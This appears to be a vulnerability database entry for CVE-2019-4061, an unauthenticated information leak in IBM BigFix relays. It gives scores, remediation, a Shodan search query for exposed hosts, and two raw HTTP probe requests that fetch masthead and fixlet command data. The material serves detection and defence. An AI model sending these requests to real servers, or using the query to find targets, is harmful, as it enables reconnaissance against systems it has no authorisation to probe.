🔙 목록으로 돌아가기

CVE-2019-4061: IBM BigFix Platform - Information Disclosure

TitleIBM BigFix Platform - Information Disclosure
Authordaffainfo
SeverityMedium
ImpactAttackers can remotely gather sensitive update and fixlet deployment information, potentially aiding targeted attacks.
RemediationEnable authenticated access for relay to prevent unauthorized information queries.
CVSS Score5.3
EPSS Score0.7919
CVE IDCVE-2019-4061
CWE IDCWE-200
Shodan Queryport:52311 "BigFixHTTPServer"
Tags cve cve2019 ibm bigfix disclosure vkev

🔍 Vulnerability Description

IBM BigFix Platform 9.2 and 9.5 contains an information disclosure vulnerability caused by not enabling authenticated access in relay, letting remote attackers query and gather update and fixlet information, exploit requires no authentication.

🌐 HTTP Request

GET /masthead/masthead.axfm HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.16
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-4061.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-4061.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A